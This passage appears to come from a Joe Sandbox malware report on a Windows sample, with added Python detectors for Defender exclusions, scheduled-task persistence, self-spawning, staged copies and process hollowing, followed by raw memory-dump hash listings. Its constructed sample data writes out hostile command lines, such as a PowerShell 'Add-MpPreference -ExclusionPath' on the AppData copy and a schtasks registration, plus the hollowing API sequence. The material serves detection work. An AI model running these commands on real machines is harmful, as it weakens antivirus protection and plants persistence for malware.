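            alerts.append({"pid": r["pid"], "rule": "self_spawn",
                           "detail": f"{r['path']} launched by its own image (pid {parent['pid']})"})
        md5, path = r["md5"].lower(), r["path"].lower()
        origin = origin_by_md5.setdefault(md5, r["path"])  # first path this hash ran from
        if origin.lower() != path and USER_WRITABLE.search(path) and (md5, path) not in reported:
            reported.add((md5, path))
            alerts.append({"pid": r["pid"], "rule": "staged_copy",
                           "detail": f"{r['path']} is byte-identical (MD5) to {origin}"})
    return alerts


# Constructed from the report's process list (pids assumed, conhost omitted).
SAMPLE_MD5 = "a5e057f72b814ddcc71246b8dd092e2a"
SAMPLE = "C:\\Users\\user\\Desktop\\vQyKfYxzXB.exe"
STAGED = "C:\\Users\\user\\AppData\\Roaming\\RTdozXra.exe"
PS = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
SCHTASKS = "C:\\Windows\\SysWOW64\\schtasks.exe"
TASK = '"C:\\Windows\\System32\\schtasks.exe" /Create /TN "Updates\\RTdozXra" /XML "{}"'
ENCODED_SCRIPT = "Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming"  # constructed
SAMPLE_PROCESSES = [
    {"pid": 1, "ppid": None, "path": SAMPLE, "md5": SAMPLE_MD5, "cmdline": f'"{SAMPLE}"'},
    {"pid": 3, "ppid": 1, "path": PS, "md5": "c32ca4acfcc635ec1ea6ed8a34df5fac",
     "cmdline": f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                f'Add-MpPreference -ExclusionPath "{STAGED}"'},
    {"pid": 5, "ppid": 1, "path": SCHTASKS, "md5": "48c2fe20575769de916f48ef0676a965",
     "cmdline": TASK.format("C:\\Users\\user\\AppData\\Local\\Temp\\tmp8902.tmp")},
    {"pid": 7, "ppid": 1, "path": SAMPLE, "md5": SAMPLE_MD5, "cmdline": f'"{SAMPLE}"'},
    {"pid": 8, "ppid": 1, "path": PS, "md5": "c32ca4acfcc635ec1ea6ed8a34df5fac",
     "cmdline": encoded_cmdline(ENCODED_SCRIPT)},  # constructed encoded variant
    {"pid": 11, "ppid": 7, "path": STAGED, "md5": SAMPLE_MD5, "cmdline": STAGED},
    {"pid": 13, "ppid": 11, "path": SCHTASKS, "md5": "48c2fe20575769de916f48ef0676a965",
     "cmdline": TASK.format("C:\\Users\\user\\AppData\\Local\\Temp\\tmp9C1D.tmp")},
    {"pid": 15, "ppid": 11, "path": STAGED, "md5": SAMPLE_MD5, "cmdline": f'"{STAGED}"'},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_PROCESSES):
        print(f"pid {a['pid']:>2}  {a['rule']:<19} {a['detail']}")
```

Run directly, it prints seven alerts for the constructed list: two Defender exclusions (plaintext and encoded), two task registrations from Temp, two self-spawns and one staged copy. In production the records would come from Sysmon event ID 1 or a sandbox JSON export; the user-writable-path check on the exclusion target is what separates this case from an installer adding an exclusion under Program Files, and the hash comparison catches the AppData copy even when the dropped file name changes between runs.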


                          Execution Graph

                          Execution Coverage:10.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:138
                          Total number of Limit Nodes:4
                          execution_graph (rendered call graph; the raw node/edge listing is collapsed here). API calls recoverable from it, by cluster:
                          • 592a1e0 -> DrawTextExW
                          • 313b330 -> GetModuleHandleW
                          • 313d6c0 -> DuplicateHandle (via 313b314)
                          • 8d4ebc0 -> PostMessageW (via 8f912da / 8f915c8)
                          • 3134668 -> CreateActCtxA (via 31344b0)
                          • injection cluster entered from 8eedb33 through 8eefda9 / 8eefdb8, whose helpers resolve to: 8f9045a -> CreateProcessA; 8f905d1 -> ReadProcessMemory; 8f90732 -> VirtualAllocEx then WriteProcessMemory; 8f908b1, 8f90b62, 8f90bf7 -> WriteProcessMemory; 8f90583, 8f9080e -> Wow64SetThreadContext; 8f905be, 8f9079b -> ResumeThread
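
The injection cluster in the execution graph above is the textbook process-hollowing sequence: CreateProcessA, ReadProcessMemory, VirtualAllocEx, repeated WriteProcessMemory, Wow64SetThreadContext (the variant a 32-bit process uses on 64-bit Windows) and ResumeThread, all issued by the same code against one child. The detector below is an added example, not part of the Joe Sandbox report: it consumes a constructed (caller pid, API name, target pid) trace of the kind an API monitor or ETW would produce, and because the graph does not expose CreateProcessA's flags it keys on call order rather than on CREATE_SUSPENDED.

```python
"""Flag the process-hollowing call sequence recovered from the execution graph.

Added example, not part of the Joe Sandbox report. The trace format
(caller pid, API name, target pid) is constructed; a real feed would come
from an API monitor or ETW. The graph does not show CreateProcessA's flags,
so the detector relies on call order, not on CREATE_SUSPENDED.
"""
from collections import defaultdict

# Classic hollowing, in order: spawn a host, optionally read/unmap its image,
# allocate and write the payload, repoint the main thread, resume it.
STAGES = (
    ("spawn",   {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("inspect", {"ReadProcessMemory", "NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("alloc",   {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write",   {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("context", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume",  {"ResumeThread", "NtResumeThread"}),
)
REQUIRED = {"spawn", "alloc", "write", "context", "resume"}  # "inspect" is optional


def detect_hollowing(trace):
    """Return {(caller, target): summary} for each target that saw every REQUIRED stage in order.

    A stage only counts if it is at or after the furthest stage already reached
    for that (caller, target) pair, so an allocation that follows
    SetThreadContext, or a write after ResumeThread, does not complete the chain.
    """
    progress = defaultdict(lambda: {"stage": -1, "seen": set(), "writes": 0})
    for caller, api, target in trace:
        for idx, (name, apis) in enumerate(STAGES):
            if api in apis:
                st = progress[(caller, target)]
                if idx >= st["stage"]:  # forward progress, or a repeat such as several writes
                    st["stage"] = idx
                    st["seen"].add(name)
                    if name == "write":
                        st["writes"] += 1
                break
    return {
        key: {"stages": [n for n, _ in STAGES if n in st["seen"]], "writes": st["writes"]}
        for key, st in progress.items() if REQUIRED <= st["seen"]
    }


# Constructed traces. The first mirrors the API nodes in the graph above:
# CreateProcessA -> ReadProcessMemory -> VirtualAllocEx -> WriteProcessMemory x4
# -> Wow64SetThreadContext -> ResumeThread, all aimed at the same child.
HOLLOW_TRACE = (
    [(100, "CreateProcessA", 200), (100, "ReadProcessMemory", 200), (100, "VirtualAllocEx", 200)]
    + [(100, "WriteProcessMemory", 200)] * 4
    + [(100, "Wow64SetThreadContext", 200), (100, "ResumeThread", 200)]
)
# A plain parent that spawns a child and waits for it.
BENIGN_TRACE = [(300, "CreateProcessW", 400), (300, "WaitForSingleObject", 400)]
# Remote write without repointing the thread: worth a look, but not hollowing.
PARTIAL_TRACE = [(500, "CreateProcessA", 600), (500, "VirtualAllocEx", 600),
                 (500, "WriteProcessMemory", 600), (500, "ResumeThread", 600)]

if __name__ == "__main__":
    for key, summary in detect_hollowing(HOLLOW_TRACE + BENIGN_TRACE + PARTIAL_TRACE).items():
        print(f"hollowing: caller {key[0]} -> target {key[1]}: {summary}")
```

Only the first trace is reported; the benign spawn and the write-only trace are not, and so is a trace in which SetThreadContext precedes the allocation, which is the point of enforcing stage order rather than counting APIs. For a WoW64 injector the same stages appear under the Wow64SetThreadContext name, as they do in this report, so both spellings sit in the same stage set.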
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$,q$,q$4cq$4cq$hq$hq$hq$|bq$|bq$|bq$$q$$q$$q$;($[0$cq$cq$cq$cq$k0
                          • API String ID: 0-3551593092
                          • Opcode ID: 23dd64ed22bc3ffeb42380235fe3ccf193b50497144f339a9b96210a3dc6f9a7
                          • Instruction ID: 9c6b57f74f39a9817fc272d9e4321e9c26a531c35b622289a89182a6b7eb035a
                          • Opcode Fuzzy Hash: 23dd64ed22bc3ffeb42380235fe3ccf193b50497144f339a9b96210a3dc6f9a7
                          • Instruction Fuzzy Hash: C3B208B4B006158FDB24DF29C894B69BBF2BF89310F1585A9E54ADB361DB30EC81CB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph for the function at 8ee11b0 (basic blocks 8ee11b0 through 8ee194e; the rendered graph is collapsed here)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$8q$8q$LRq$LRq$LRq$$q$$q$$q$$q$$q$$q$$q
                          • API String ID: 0-3043932997
                          • Opcode ID: 619217f6e4970358568b0f2415b59720a29669957088ddcdcdd0463531e2d192
                          • Instruction ID: 45e918361f0bc1dbbd43410521d21569023203fc3c3ca48af95902a1f363030c
                          • Opcode Fuzzy Hash: 619217f6e4970358568b0f2415b59720a29669957088ddcdcdd0463531e2d192
                          • Instruction Fuzzy Hash: 6D22B372E04218CFC714CBA9D8446ADBBB2FF85703F19916AE856DB251D7349C82CB51

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph for the function at 76f58c0 (basic blocks 76f58c0 through 76f5fbf; the function calls 76f5ff0 / 76f6000 and 76f6930 / 76f6940 and recurses into 76f58b0 / 76f58c0; the rendered graph is collapsed here)
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: LRq$LRq$LRq$LRq
                          • API String ID: 0-3399003930
                          • Opcode ID: d868d8ad1090d2123415caacd638acbfa5fecb05b5fb0c4ca9f8cc301ddffdbf
                          • Instruction ID: 9462956bff11d44eabb8261cee9e32c3d7c52727c235126f5aeb26c452408a74
                          • Opcode Fuzzy Hash: d868d8ad1090d2123415caacd638acbfa5fecb05b5fb0c4ca9f8cc301ddffdbf
                          • Instruction Fuzzy Hash: 9C323974A012068FDB14DF69D484AAEBBF2FF89300F158559E917AB366D730EC51CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: V
                          • API String ID: 0-1342839628
                          • Opcode ID: 498b7bea72febf7c901fd1a2af0f0f53d032c0c7faad943cf63b6579d1a57801
                          • Instruction ID: 7872043943802a76d8bfeebaadad7d4f130b48e34e734a70dd27eb0b5afb6c2c
                          • Opcode Fuzzy Hash: 498b7bea72febf7c901fd1a2af0f0f53d032c0c7faad943cf63b6579d1a57801
                          • Instruction Fuzzy Hash: 39424870A00200CFDB15DF68C594A6ABBF2BF89342F55956DE946DB395DB30EC82CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pqq
                          • API String ID: 0-1334384951
                          • Opcode ID: afe2f737df17e99214c34b79f209bd7745b7959b4bcbd25e38c3506521c03943
                          • Instruction ID: bdfdf1fc20c071d13a83a11ec10ba599aaeae9a29236c17ddea9a0e7c26c5f9f
                          • Opcode Fuzzy Hash: afe2f737df17e99214c34b79f209bd7745b7959b4bcbd25e38c3506521c03943
                          • Instruction Fuzzy Hash: 6BD18F74E002188FDB54DFA9D984B9DBBB2FF89300F1481A9D809AB355DB31AD86CF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Pqq
                          • API String ID: 0-1334384951
                          • Opcode ID: d4f167ff916a22b691e51c4c5cc22c7ebdd401c0fec2c6eb61124f6d38c8c669
                          • Instruction ID: 3bc3e4430a6c72a9cc6998986878d8049d715f448d87105b98d742a2adfd3453
                          • Opcode Fuzzy Hash: d4f167ff916a22b691e51c4c5cc22c7ebdd401c0fec2c6eb61124f6d38c8c669
                          • Instruction Fuzzy Hash: 28B18F74E002189FDB54DFA9D994A9DBBF2FF89300F1481AAD809AB365DB31AD41CF50
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c818503c75ab847327d03b1230ba0671f47e24dad470caf280498a4463298e14
                          • Instruction ID: 9e3393af754289ff101cfca5235dafac87b474c31a8b2a14ac3b61f0e20d5a99
                          • Opcode Fuzzy Hash: c818503c75ab847327d03b1230ba0671f47e24dad470caf280498a4463298e14
                          • Instruction Fuzzy Hash: EE4255B1A003818FDB258F75D48976ABFB6BF84305F544569E2438BBA1DF35E882CB50
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7bc961b36a7bd297c09396ebb0dd83c08af2acca1c6d2d95e08c050839ec96c
                          • Instruction ID: 95a9d35a9c3f3e2500b729557ead99043e007fbffae5ef1235da098441ff7ad8
                          • Opcode Fuzzy Hash: e7bc961b36a7bd297c09396ebb0dd83c08af2acca1c6d2d95e08c050839ec96c
                          • Instruction Fuzzy Hash: E7123570A103008FD7289F69D899A6ABBF2FFC9302B54842DE58797795CF75AC42CB50
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72767ebc329c7ec1553487813d32567f72d9c7d4edcb0be38e2053c7792f51d5
                          • Instruction ID: a1e4e3e07aeb7024b713dd5135bce8a586c4b5d09dcad7c361e7c78bc2571dd3
                          • Opcode Fuzzy Hash: 72767ebc329c7ec1553487813d32567f72d9c7d4edcb0be38e2053c7792f51d5
                          • Instruction Fuzzy Hash: DE126B74A00705CFD754DF68C584AAABBF2FF88201B59C599E549DB362CB30ED46CB90
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3494a3c9139492ac5b611402d6d5f8408ef64913cbcd6f9c482c8ab0c10b1677
                          • Instruction ID: a8551648f91de443886e58141d06254bc41afb4e6eeaa7c3d628387d40c414da
                          • Opcode Fuzzy Hash: 3494a3c9139492ac5b611402d6d5f8408ef64913cbcd6f9c482c8ab0c10b1677
                          • Instruction Fuzzy Hash: 96F189B1A10705DFDB25CF69C984AAABBF2BF48300F18856DE4569B761DB35EC42CB40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3feddd30be6954c25fd0b7fac83fd5bb266bd5c2d4bb9ed526efd523a44ab71
                          • Instruction ID: 9869c4e226597a1da1a46acf8ec0bafdf753e00051d8843a91a2715c7ce39bda
                          • Opcode Fuzzy Hash: c3feddd30be6954c25fd0b7fac83fd5bb266bd5c2d4bb9ed526efd523a44ab71
                          • Instruction Fuzzy Hash: 6BF14E74A10205CFDB18DFA5C894AAEBBB2FF89305F148569E906AB355DB34EC46CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$4cq$4cq$hq$hq
                          • API String ID: 0-1415917900
                          • Opcode ID: 013751fa34d16377bf28a0076e227d9198833a8f563e011296636e653831c420
                          • Instruction ID: 1d45f5c102d5f23f3213d57bd81893609b38e25be4259d5406da34f557e3a8da
                          • Opcode Fuzzy Hash: 013751fa34d16377bf28a0076e227d9198833a8f563e011296636e653831c420
                          • Instruction Fuzzy Hash: 14B12BB4A006068FDB24CF69C484B59BBF6FF88710F1984E9E54A9B365DB31EC85CB50

                          Control-flow Graph
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: (q$(q$(q
                          • API String ID: 0-2103260149
                          • Opcode ID: f5faac578d32045dc3d5393f692bcec979df74448a92586dce4fd4c3d100e0b8
                          • Instruction ID: ca03bd7caa43cc478a49769eb3f43e1e645c35fbbd35f4f4456a9b861740a444
                          • Opcode Fuzzy Hash: f5faac578d32045dc3d5393f692bcec979df74448a92586dce4fd4c3d100e0b8
                          • Instruction Fuzzy Hash: 94311031B043114FD358AF79D840B5FBBE6EFC86603648229E80AEB354DE31EC0687A4

                          Control-flow Graph
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 88e91a96190032a51c0ff34704986567d8776d70713d45bb608fe333ad4f4c18
                          • Instruction ID: a1756b236f056ce009215a7cef63d1985f11ec6def6d0d4eaa63ad9fb4529939
                          • Opcode Fuzzy Hash: 88e91a96190032a51c0ff34704986567d8776d70713d45bb608fe333ad4f4c18
                          • Instruction Fuzzy Hash: 7F634870A40218ABEB359F50CC56BAEBA72FB89700F5050A9E34A7B2D0DE751E81DF54

                          Control-flow Graph
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 7$Hq
                          • API String ID: 0-2358524199
                          • Opcode ID: 0bc4d9ebce0e5d9619653c22b2de38c0cb848044027d812a9e45359dcfed6d5c
                          • Instruction ID: 9694685ec68e35283f09898bb974a220f1aaa0e270e5116b66a1404564a66e7b
                          • Opcode Fuzzy Hash: 0bc4d9ebce0e5d9619653c22b2de38c0cb848044027d812a9e45359dcfed6d5c
                          • Instruction Fuzzy Hash: B622AFB0A242058FDB15CFA4C884BAEBBB2FF89300F15C569E4069B354DB35ED42CB95

                          Control-flow Graph
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq$U
                          • API String ID: 0-3764088092
                          • Opcode ID: 3508a2a502fa332602a195101ab7c2e4a907219a30bd251187bdd5308648c750
                          • Instruction ID: 1ae2807ff0f9bafbc45e731727b13532df2dbd5b5325e0526f5909f7f3fbe88c
                          • Opcode Fuzzy Hash: 3508a2a502fa332602a195101ab7c2e4a907219a30bd251187bdd5308648c750
                          • Instruction Fuzzy Hash: B98191F8F38205CBD7148A2AD4547797BA1EB46341F04856AEC47CB3A1CA38DD46EB53

                          Control-flow Graph
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: %*&/)(#$^@!~-_$0,Aq
                          • API String ID: 0-2017700313
                          • Opcode ID: fa37030b9b205da08eae406b154467c2d70053d0e1b6e26e088f61bd047f9d1e
                          • Instruction ID: 995593049ae40b4106064f5de544661e77b6f586faa0f4f09e39b162a33e6d5f
                          • Opcode Fuzzy Hash: fa37030b9b205da08eae406b154467c2d70053d0e1b6e26e088f61bd047f9d1e
                          • Instruction Fuzzy Hash: 9751D331F00214AFD700BB64E44579EBBB2FF89301F1489A8D9859B396DF31AD5ACB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: %*&/)(#$^@!~-_$0,Aq
                          • API String ID: 0-2017700313
                          • Opcode ID: 678ac22a65f8e0710968622bb58097819dd08e246e9524191b2a4ba46df48fda
                          • Instruction ID: b3f2aaaf4ab83ea7029345b07d5cd1c2c1f47efa7401f796e6b763f8b6d7daa4
                          • Opcode Fuzzy Hash: 678ac22a65f8e0710968622bb58097819dd08e246e9524191b2a4ba46df48fda
                          • Instruction Fuzzy Hash: 0C51C331F00214AFD700BB68D4457AEBBB2FF89301F1489A8D9859B396DF71AD568B81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$V
                          • API String ID: 0-4231741877
                          • Opcode ID: 84c3c3814df88a259783fdc313675064bcb60c56886e386fe0f32b34e42ffb28
                          • Instruction ID: 9ba0b033ae916428ed4c7b1146d3262fdebce5f9fa67d38d3f25d91dcc67cdbf
                          • Opcode Fuzzy Hash: 84c3c3814df88a259783fdc313675064bcb60c56886e386fe0f32b34e42ffb28
                          • Instruction Fuzzy Hash: 5D21A172A00219DFCB55CFA8C980AEFBBF5BF89211B04816AE604DB251D7309E56CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$$q
                          • API String ID: 0-3126353813
                          • Opcode ID: e4e89f75040883ede1474489f4f06cae8bc15cd96f33bd449c4d0a463cc143cc
                          • Instruction ID: 362e6105ca6e7e36ae676fa3bba7eea426436712dd1cb745cee514f5a69c8b5c
                          • Opcode Fuzzy Hash: e4e89f75040883ede1474489f4f06cae8bc15cd96f33bd449c4d0a463cc143cc
                          • Instruction Fuzzy Hash: 72D01212A5470ADFAA3D8B26BC052A636547E60B723566356D833866F5DE11C443C261
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hbq
                          • API String ID: 0-2269934739
                          • Opcode ID: 1534969a1be8c2026614149ebe25ae999bdc1a1b54b09e10304043502dace3c4
                          • Instruction ID: d8550b412e6c6cb51ffa5829c7fc682c19b576d6d2cf380a3448b8385e18f281
                          • Opcode Fuzzy Hash: 1534969a1be8c2026614149ebe25ae999bdc1a1b54b09e10304043502dace3c4
                          • Instruction Fuzzy Hash: D8426D74A00205DFCB14DF68C584A9EBBF2FF88351F159699E845AB361DB30ED46CB90
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EED5A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: dc0cd14a1e120f837a8a5069e4ab4ac8c2b28299f4990b932af5ac043896a5b4
                          • Instruction ID: 9e2c4e47acd963b8c6c769cd712a168452ee74684ba1a8a2026edffaca789928
                          • Opcode Fuzzy Hash: dc0cd14a1e120f837a8a5069e4ab4ac8c2b28299f4990b932af5ac043896a5b4
                          • Instruction Fuzzy Hash: 77A15E72E0071A8FDB24CFA8CC417EDBBB2BF48315F148569E818A7240DB759985CF91
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EED5A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 33ac970c7bd2c35a7c0e5444292aa25c885dcf9c91d2ac9a53c6acf40832ab95
                          • Instruction ID: 58ab77699b5cfe5a7f12579c612bac552ac5cf0639d688e053db8c7b95a4cbae
                          • Opcode Fuzzy Hash: 33ac970c7bd2c35a7c0e5444292aa25c885dcf9c91d2ac9a53c6acf40832ab95
                          • Instruction Fuzzy Hash: 40914D72E0071A8FDB24CF68CC41BEDBBB2BB48315F148669E819A7240DB759985CF91
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0313B67E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 0e8c1c2f0eb928bd374342bac3dc3c8df92ed2b6c01333cf386d816201f3945f
                          • Instruction ID: ce8ab26eda6f15532cdcbd9d8303d7ba861f08f44ef613560ba26953ca6f4b40
                          • Opcode Fuzzy Hash: 0e8c1c2f0eb928bd374342bac3dc3c8df92ed2b6c01333cf386d816201f3945f
                          • Instruction Fuzzy Hash: 38817770A04B058FDB24DF2AD45579ABBF1FF89300F04892DD48ADBA50EB34E846CB95
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031359C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: ccc7d255ed9cc1e6d980701514b040a9d21f9bfa53a108a9dcf600eb583bda0b
                          • Instruction ID: fa404da20e69efa869c2f89c47b4ff271d926c206c90c2023739ac69215be7ce
                          • Opcode Fuzzy Hash: ccc7d255ed9cc1e6d980701514b040a9d21f9bfa53a108a9dcf600eb583bda0b
                          • Instruction Fuzzy Hash: F641E2B1C0072DCBDB24DFA9C884B9DBBF6BF49714F20816AD408AB251DB756946CF90
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 031359C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: Create
                          • String ID:
                          • API String ID: 2289755597-0
                          • Opcode ID: cd95205b4537ac96ee24243590eb23e1dc8388de5e6954afcf339e08af25586c
                          • Instruction ID: 85b8cb964c1bd0f4917e52069b581b21387c49445c8d95af6a20ec3b59473984
                          • Opcode Fuzzy Hash: cd95205b4537ac96ee24243590eb23e1dc8388de5e6954afcf339e08af25586c
